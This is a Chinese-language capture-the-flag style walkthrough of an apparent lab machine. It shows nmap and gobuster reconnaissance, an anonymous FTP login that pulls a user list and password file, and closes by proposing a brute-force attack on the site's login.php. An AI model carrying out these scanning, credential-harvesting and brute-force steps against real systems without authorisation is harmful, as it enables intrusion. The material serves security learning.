先进行nmap扫描

两种方式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(spencer㉿kali)-[~/桌面]
└─$ sudo nmap -sC 10.129.237.84 -Pn -n --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-14 17:25 CST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 84.81% done; ETC: 17:25 (0:00:00 remaining)
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 87.76% done; ETC: 17:26 (0:00:01 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.58% done; ETC: 17:26 (0:00:00 remaining)
Nmap scan report for 10.129.237.84
Host is up (0.48s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.71
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open  http
|_http-title: Smash - Bootstrap Business Template

Nmap done: 1 IP address (1 host up) scanned in 22.06 seconds

直接扫出协议详细版本与目前权限

或者可以用快速扫端口法

1
sudo nmap -sS -Pn -n --open 10.129.237.84

可以快速扫描出打开的端口。

1
ftp-anon: Anonymous FTP login allowed (FTP code 230)

这个表示可以匿名登陆,也就是有一个默认用户名为anonymous,

我们登陆一下

image-20220614174804350

登陆成功。

我们查看可以使用的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ftp> help
Commands may be abbreviated.  Commands are:

!               cdup            epsv4           hash            mdelete         mput            pdir            quote           rmdir           struct          user
$               chmod           epsv6           help            mdir            mreget          pls             rate            rstatus         sunique         verbose
account         close           exit            idle            mget            msend           pmlsd           rcvbuf          runique         system          xferbuf
append          cr              features        image           mkdir           newer           preserve        recv            send            tenex           ?
ascii           debug           fget            lcd             mls             nlist           progress        reget           sendport        throttle
bell            delete          form            less            mlsd            nmap            prompt          remopts         set             trace
binary          dir             ftp             lpage           mlst            ntrans          proxy           rename          site            type
bye             disconnect      gate            lpwd            mode            open            put             reset           size            umask
case            edit            get             ls              modtime         page            pwd             restart         sndbuf          unset
cd              epsv            glob            macdef          more            passive         quit            rhelp           status          usage

我们用get和dir命令

1
2
3
4
5
6
7
8
ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||41292|)
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |*****************************************************************************************************************************************|    33        0.12 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:01 (0.03 KiB/s)

拿到文件

1
2
3
4
5
6
7
8
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||45746|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |*****************************************************************************************************************************************|    62        0.23 KiB/s    00:00 ETA
226 Transfer complete.
62 bytes received in 00:01 (0.05 KiB/s)

拿到所有用户名和密码

我们打开userlist文件查看用户名,然后尝试用用户名登陆

结果尝试失败

1
2
3
4
5
6
7
8
┌──(spencer㉿kali)-[~/桌面]
└─$ ftp 10.129.237.84
Connected to 10.129.237.84.
220 (vsFTPd 3.0.3)
Name (10.129.237.84:spencer): aron
530 This FTP server is anonymous only.
ftp: Login failed
ftp>

并且看到530 This FTP server is anonymous only.这个服务器只能用匿名登陆,所以我们只能换个方式

在之前的扫描结果中,我们还看到了httpd服务,用的Apache服务器,我们可以使用Wappalyzer插件查看其网站有哪些服务。

引用以前的文章,这里提到了一种不同的、更直接的方式来导航任何隐藏的或难以访问的目录和页面,这就是通过dir分解。使用gobuster作为我们选择的工具,我们可以为脚本使用以下开关来获得最快、最准确的结果。

1
2
3
4
dir : Uses directory/file enumeration mode.
--url : The target URL.
--wordlist : Path to the wordlist.
-x : File extension(s) to search for.

对于-x,我们可以指定php和html来过滤掉所有我们不感兴趣的不必要的混乱。

我们可以看到这个工具比较好用!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(spencer㉿kali)-[~/桌面]
└─$ gobuster dir --url http://10.129.237.84/ --wordlist directory/directory-list-2.3-small.txt -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.237.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2022/06/14 17:58:12 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 58565]
/login.php            (Status: 200) [Size: 1577] 
/assets               (Status: 301) [Size: 315] [--> http://10.129.237.84/assets/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.237.84/css/]   
/js                   (Status: 301) [Size: 311] [--> http://10.129.237.84/js/]    
/logout.php           (Status: 302) [Size: 0] [--> login.php]                     
/config.php           (Status: 200) [Size: 0]                                     
/fonts                (Status: 301) [Size: 314] [--> http://10.129.237.84/fonts/] 
/dashboard            (Status: 301) [Size: 318] [--> http://10.129.237.84/dashboard/]
Progress: 13095 / 262995 (4.98%)                                                    ^C
[!] Keyboard interrupt detected, terminating.
                                                                                     
===============================================================
2022/06/14 18:11:54 Finished
===============================================================

可以看到扫描比较详细。我们看到了login.php,开始爆破。

进入页面后,爆破密码即可。